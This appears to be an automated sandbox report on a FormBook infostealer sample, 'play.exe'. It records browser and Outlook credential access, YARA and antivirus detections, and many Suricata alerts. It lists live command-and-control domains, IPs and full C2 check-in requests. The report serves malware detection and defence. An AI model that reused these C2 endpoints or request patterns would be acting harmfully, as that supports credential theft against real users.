Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\relog.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 0.2.play.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4104437316.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4104395231.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2062479461.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4106256857.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4103634894.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2061972326.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4104462118.0000000003910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.248.169.48	www.astrocloud.shop	United States	16509	AMAZON-02US	true
200.58.111.42	pilibit.site	Argentina	27823	DattateccomAR	true
199.59.243.226	www.dom-2.online	United States	395082	BODIS-NJUS	true
84.32.84.32	pacoteagil.shop	Lithuania	33922	NTT-LT-ASLT	true
154.23.184.218	23ddv.top	United States	174	COGENT-174US	true
35.244.245.121	shops.vipshopbuy.com	United States	15169	GOOGLEUS	false
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	true
154.23.176.197	www.shipincheshi.skin	United States	174	COGENT-174US	true
45.113.201.77	www.sssqqq07-22.fun	China	137697	CHINATELECOM-JIANGSU-YANGZHOU-IDCCHINATELECOMJiangSuYangZ	true
188.114.97.3	www.playdoge.buzz	European Union	13335	CLOUDFLARENETUS	true
188.114.96.3	www.x0x9x8x8x7x6.shop	European Union	13335	CLOUDFLARENETUS	true
52.71.57.184	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com	United States	14618	AMAZON-AESUS	true
3.33.130.190	ablackwomansmarch.info	United States	8987	AMAZONEXPANSIONGB	true
3.33.244.179	www.soliro.life	United States	8987	AMAZONEXPANSIONGB	true

Contacted Domains

Name	IP	Active
www.playdoge.buzz	188.114.97.3	true
hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com	52.71.57.184	true
www.astrocloud.shop	13.248.169.48	true
ablackwomansmarch.info	3.33.130.190	true
natroredirect.natrocdn.com	85.159.66.93	true
www.x0x9x8x8x7x6.shop	188.114.96.3	true
www.shipincheshi.skin	154.23.176.197	true
www.soliro.life	3.33.244.179	true
pilibit.site	200.58.111.42	true
shops.vipshopbuy.com	35.244.245.121	true
www.dom-2.online	199.59.243.226	true
pacoteagil.shop	84.32.84.32	true
23ddv.top	154.23.184.218	true
www.sssqqq07-22.fun	45.113.201.77	true
www.pilibit.site	unknown	unknown
www.farukugurluakdogan.xyz	unknown	unknown
www.23ddv.top	unknown	unknown
www.pelus-pijama-pro.shop	unknown	unknown
www.rantup.com	unknown	unknown
www.pacoteagil.shop	unknown	unknown
206.23.85.13.in-addr.arpa	unknown	unknown
www.kiristyle.shop	unknown	unknown
www.ablackwomansmarch.info	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.astrocloud.shop/7mxg/?fVU8=HRzx&ZXzt1jdX=PQHLJRKwaUPjwxhk2GYQzWR8R4DRGzyCfDD5sOvFtKjG8ZD7og/+N9qEbnENWaH4IudDgrnmQMf3V2LiiZJ44VCDghgV12m/k9bnp6b2FJp2apyWNeh51w4=	true	Avira URL Cloud: safe	unknown
http://www.playdoge.buzz/dkjp/?fVU8=HRzx&ZXzt1jdX=g2307S0kJQiqPtWe9TaGLV4XrhAf17rff9mCmcpeUxXKbAyFV69cgnnV7KzKdCkqPjJMU4CDOpfM3KvXThn0JCzwXjXd5TSeD8+4iPC5x1oijKUfR6VltjM=	true	Avira URL Cloud: safe	unknown
http://www.rantup.com/49cz/?ZXzt1jdX=jojqsqROcSZ/YEZnqnzfA751mBAelv+z1FKsCArF5g8fu/bWNXnvEEANdKHh77itbEpRc/umBoU8ELsN52AVYzrBAQ0zHIll5d6B3+Pe+PauASdNc9uZplY=&fVU8=HRzx	true	Avira URL Cloud: safe	unknown
http://www.ablackwomansmarch.info/byvv/?fVU8=HRzx&ZXzt1jdX=tE8Yf8WYynwECT0ucMl0wg/uU5lgFM4d0lH0abgHpBN2sUJXXfRRiqZbMUuokEJXmaYUQiqZbA9PoCScD7vXiY1sERFkkaBh5gb6EBRxs5CGi9vgIcMFHkg=	true	Avira URL Cloud: safe	unknown
http://www.kiristyle.shop/vod9/?ZXzt1jdX=ivZzxM4Jfmd0ai63Imd0RTeSPfjP5G+FujZTnvobDNePA17XvJlKosOwY30TiI8/8bBp7iesbvq7jnISR7nTIeFXysPRp6fhppRWXfcEPYVY19hX8MgB2Jw=&fVU8=HRzx	false	Avira URL Cloud: safe	unknown
http://www.rantup.com/49cz/	true	Avira URL Cloud: safe	unknown
http://www.23ddv.top/74hi/?ZXzt1jdX=nGINNi176Mw32GVF7tlDMHUsDN0FLET+wtq3FMVEcbrakWyJqw7BUNhsS7t1Rgl5P/JWtiTsx+SLLpCMe4oAPWkmauoeOlVhsSF1Co6Ym9oRZTWO7OX8DvA=&fVU8=HRzx	true	Avira URL Cloud: safe	unknown
http://www.sssqqq07-22.fun/90p1/	true	Avira URL Cloud: safe	unknown
http://www.soliro.life/qkji/	true	Avira URL Cloud: safe	unknown
http://www.pacoteagil.shop/xz0a/?fVU8=HRzx&ZXzt1jdX=R3gP1liecH9CEWR58z6vcTu6ZE4CAT74npPRwlq9MC9LpGUhjUlt5tD2zx/yN6MyUXEHC7bzQwr/lImARbHG2FNXY0baa7q+x6BXcM5hNR/AFuKMUDCbLno=	true	Avira URL Cloud: safe	unknown
http://www.23ddv.top/74hi/	true	Avira URL Cloud: safe	unknown
http://www.playdoge.buzz/dkjp/	true	Avira URL Cloud: safe	unknown
http://www.soliro.life/qkji/?ZXzt1jdX=3hO+HyIcgB6G+8N3LN2uHekX7uSI4ghDkWDZahGxK7g3yB5CU5vB8EVkGOKlqaF5ueualLyQHKnu8Mv7Lxk5XzuYxgHzk6nkrMT1MeRjw16ajjrCjygjRTw=&fVU8=HRzx	true	Avira URL Cloud: safe	unknown
http://www.astrocloud.shop/7mxg/	true	Avira URL Cloud: safe	unknown
http://www.farukugurluakdogan.xyz/3yei/?ZXzt1jdX=nZxM6ZbVUNvqNiLtXDfR+7LNAf7PNkUZzI4HUL3o8BmDorsgh/n2PsYU59HPtFBmSHz6AM8ZTB8ClF4C+tQS6IhxM8ffpjo9QeQxbJNt08sZUqYfX3nGFAA=&fVU8=HRzx	true	Avira URL Cloud: safe	unknown
http://www.x0x9x8x8x7x6.shop/ps9q/	true	Avira URL Cloud: safe	unknown
http://www.pilibit.site/ydsb/	true	Avira URL Cloud: safe	unknown
http://www.ablackwomansmarch.info/byvv/	true	Avira URL Cloud: safe	unknown
http://www.sssqqq07-22.fun/90p1/?ZXzt1jdX=MVS+namUa0UQavAdJ03s9uygERI+uY3eTsOcU3Wjrfb6xHYz5dyozzt8oos7zGJG9hFOZSWQuwu+QIVHqyXNg2+Ky1HzvorxqHxW6JBLA1lJwD0Ad7NFYWY=&fVU8=HRzx	true	Avira URL Cloud: safe	unknown
http://www.pilibit.site/ydsb/?ZXzt1jdX=5MonW/+sdj9S4Qi9EuAiwzCb3teTJ4mp2FYtUqDRNpZKZK4yIAJ/199x4+50cXOASEslm+CgFxsG9ylKFHmgriXfA832cO2sv57t9clCzJ2/NV8benXuPPs=&fVU8=HRzx	true	Avira URL Cloud: safe	unknown
http://www.shipincheshi.skin/qer4/	true	Avira URL Cloud: safe	unknown
http://www.kiristyle.shop/vod9/	false	Avira URL Cloud: safe	unknown
http://www.farukugurluakdogan.xyz/3yei/	true	Avira URL Cloud: safe	unknown
http://www.pacoteagil.shop/xz0a/	true	Avira URL Cloud: safe	unknown

AV Detection

Multi AV Scanner detection for submitted file

Source: play.exe	ReversingLabs: Detection: 55%
Source: play.exe	Virustotal: Detection: 58%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 0.2.play.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4104437316.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4104395231.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2062479461.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4106256857.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4103634894.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2061972326.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4104462118.0000000003910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: play.exe

Joe Sandbox ML: detected

Uses 32bit PE files

Source: play.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: play.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: relog.pdbGCTL source: play.exe, 00000000.00000003.2061474082.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, aAqvujXSGNo.exe, 00000004.00000002.4104144207.0000000001478000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: relog.pdb source: play.exe, 00000000.00000003.2061474082.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, aAqvujXSGNo.exe, 00000004.00000002.4104144207.0000000001478000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: aAqvujXSGNo.exe, 00000004.00000000.1976786977.0000000000A9E000.00000002.00000001.01000000.00000005.sdmp, aAqvujXSGNo.exe, 00000006.00000002.4103761428.0000000000A9E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: play.exe, 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, play.exe, 00000000.00000003.1959294394.00000000024B4000.00000004.00000020.00020000.00000000.sdmp, play.exe, 00000000.00000003.1957582944.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, play.exe, 00000000.00000002.2062190338.00000000027FE000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000005.00000002.4104609981.0000000003210000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000005.00000002.4104609981.00000000033AE000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000005.00000003.2063650068.0000000003064000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000005.00000003.2061751738.0000000002E77000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: play.exe, play.exe, 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, play.exe, 00000000.00000003.1959294394.00000000024B4000.00000004.00000020.00020000.00000000.sdmp, play.exe, 00000000.00000003.1957582944.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, play.exe, 00000000.00000002.2062190338.00000000027FE000.00000040.00001000.00020000.00000000.sdmp, relog.exe, relog.exe, 00000005.00000002.4104609981.0000000003210000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000005.00000002.4104609981.00000000033AE000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000005.00000003.2063650068.0000000003064000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000005.00000003.2061751738.0000000002E77000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\relog.exe

Code function: 5_2_008CC700 FindFirstFileW,FindNextFileW,FindClose,

5_2_008CC700

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\SysWOW64\relog.exe	Code function: 4x nop then xor eax, eax	5_2_008B9AA0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 4x nop then pop edi	5_2_008BE28E
Source: C:\Windows\SysWOW64\relog.exe	Code function: 4x nop then pop edi	5_2_008D2828
Source: C:\Windows\SysWOW64\relog.exe	Code function: 4x nop then mov ebx, 00000004h	5_2_031004E8
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4x nop then xor eax, eax	6_2_0530162F
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4x nop then pop edi	6_2_052FC17A
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 4x nop then mov ebx, 00000004h	7_2_000001917363E4E8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58093 -> 199.59.243.226:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58141 -> 35.244.245.121:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58108 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58133 -> 154.23.176.197:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58103 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58102 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58109 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58125 -> 52.71.57.184:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58099 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58106 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58121 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58112 -> 154.23.184.218:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58138 -> 35.244.245.121:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58105 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58101 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58110 -> 154.23.184.218:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58135 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58100 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58142 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58131 -> 154.23.176.197:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58136 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58119 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58117 -> 200.58.111.42:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58116 -> 200.58.111.42:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58134 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58107 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58124 -> 52.71.57.184:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58113 -> 154.23.184.218:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58118 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58098 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58096 -> 3.33.244.179:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58111 -> 154.23.184.218:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58114 -> 200.58.111.42:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58126 -> 45.113.201.77:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58115 -> 200.58.111.42:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58143 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58095 -> 3.33.244.179:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58128 -> 45.113.201.77:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58130 -> 154.23.176.197:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58123 -> 52.71.57.184:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58140 -> 35.244.245.121:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58094 -> 3.33.244.179:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58097 -> 3.33.244.179:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58122 -> 52.71.57.184:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58104 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58120 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58127 -> 45.113.201.77:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58137 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58132 -> 154.23.176.197:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58129 -> 45.113.201.77:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58139 -> 35.244.245.121:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58144 -> 188.114.96.3:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.farukugurluakdogan.xyz

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48
Source: Joe Sandbox View	IP Address: 199.59.243.226 199.59.243.226

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: DattateccomAR DattateccomAR
Source: Joe Sandbox View	ASN Name: BODIS-NJUS BODIS-NJUS
Source: Joe Sandbox View	ASN Name: NTT-LT-ASLT NTT-LT-ASLT
Source: Joe Sandbox View	ASN Name: COGENT-174US COGENT-174US

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /184n/?fVU8=HRzx&ZXzt1jdX=tTw8bcF9ynF7NxNhIHnuE7PiwszZpdssllgSy53HU9FeypU+H5DHpDJo8VdiQv3xpb0wKqaBA5vXWKI3ejJljZEG/7rnegNjrXxjwHY74ScRyh8HTmiatRM= HTTP/1.1Host: www.dom-2.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic	HTTP traffic detected: GET /qkji/?ZXzt1jdX=3hO+HyIcgB6G+8N3LN2uHekX7uSI4ghDkWDZahGxK7g3yB5CU5vB8EVkGOKlqaF5ueualLyQHKnu8Mv7Lxk5XzuYxgHzk6nkrMT1MeRjw16ajjrCjygjRTw=&fVU8=HRzx HTTP/1.1Host: www.soliro.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic	HTTP traffic detected: GET /dkjp/?fVU8=HRzx&ZXzt1jdX=g2307S0kJQiqPtWe9TaGLV4XrhAf17rff9mCmcpeUxXKbAyFV69cgnnV7KzKdCkqPjJMU4CDOpfM3KvXThn0JCzwXjXd5TSeD8+4iPC5x1oijKUfR6VltjM= HTTP/1.1Host: www.playdoge.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic	HTTP traffic detected: GET /3yei/?ZXzt1jdX=nZxM6ZbVUNvqNiLtXDfR+7LNAf7PNkUZzI4HUL3o8BmDorsgh/n2PsYU59HPtFBmSHz6AM8ZTB8ClF4C+tQS6IhxM8ffpjo9QeQxbJNt08sZUqYfX3nGFAA=&fVU8=HRzx HTTP/1.1Host: www.farukugurluakdogan.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic	HTTP traffic detected: GET /xz0a/?fVU8=HRzx&ZXzt1jdX=R3gP1liecH9CEWR58z6vcTu6ZE4CAT74npPRwlq9MC9LpGUhjUlt5tD2zx/yN6MyUXEHC7bzQwr/lImARbHG2FNXY0baa7q+x6BXcM5hNR/AFuKMUDCbLno= HTTP/1.1Host: www.pacoteagil.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic	HTTP traffic detected: GET /74hi/?ZXzt1jdX=nGINNi176Mw32GVF7tlDMHUsDN0FLET+wtq3FMVEcbrakWyJqw7BUNhsS7t1Rgl5P/JWtiTsx+SLLpCMe4oAPWkmauoeOlVhsSF1Co6Ym9oRZTWO7OX8DvA=&fVU8=HRzx HTTP/1.1Host: www.23ddv.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic	HTTP traffic detected: GET /ydsb/?ZXzt1jdX=5MonW/+sdj9S4Qi9EuAiwzCb3teTJ4mp2FYtUqDRNpZKZK4yIAJ/199x4+50cXOASEslm+CgFxsG9ylKFHmgriXfA832cO2sv57t9clCzJ2/NV8benXuPPs=&fVU8=HRzx HTTP/1.1Host: www.pilibit.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic	HTTP traffic detected: GET /7mxg/?fVU8=HRzx&ZXzt1jdX=PQHLJRKwaUPjwxhk2GYQzWR8R4DRGzyCfDD5sOvFtKjG8ZD7og/+N9qEbnENWaH4IudDgrnmQMf3V2LiiZJ44VCDghgV12m/k9bnp6b2FJp2apyWNeh51w4= HTTP/1.1Host: www.astrocloud.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
